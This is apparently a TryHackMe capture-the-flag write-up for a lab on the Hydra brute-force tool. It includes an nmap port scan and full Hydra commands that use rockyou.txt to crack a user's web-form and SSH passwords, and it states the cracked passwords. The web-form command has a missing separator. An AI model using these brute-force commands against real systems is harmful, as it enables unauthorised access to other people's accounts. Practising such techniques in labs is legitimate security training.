TryHackMe: Hydra

1. Use Hydra to bruteforce molly’s web password. What is flag 1?

Scan open ports

nmap -p- <ip>

Access HTTP site, try logging-in to see what happen

Seems like I don’t have correct credentials.

View source shows nothing

Intercept with Burp Suite. It’s POST request.

Try SQL injection, but It’s not work neither.

Without any further information. I’ll have to brute-forcing with hydra

Craft the command.

hydra -l molly -P rockyou.txt <ip> http-post-form "/loginusername=^USER^&password=^PASS^:F=Your username or password is incorrect." -V

Run the command

Result -> molly:sunshine

Login, now I have first flag.

2. Use Hydra to bruteforce molly’s SSH password. What is flag 2?

hydra -l molly -P Desktop/rockyou.txt 10.10.138.145 ssh -t 4

Result -> molly:butterfly

SSH login

ssh molly@<ip>

Read flag file

ls 
cat flag2.txt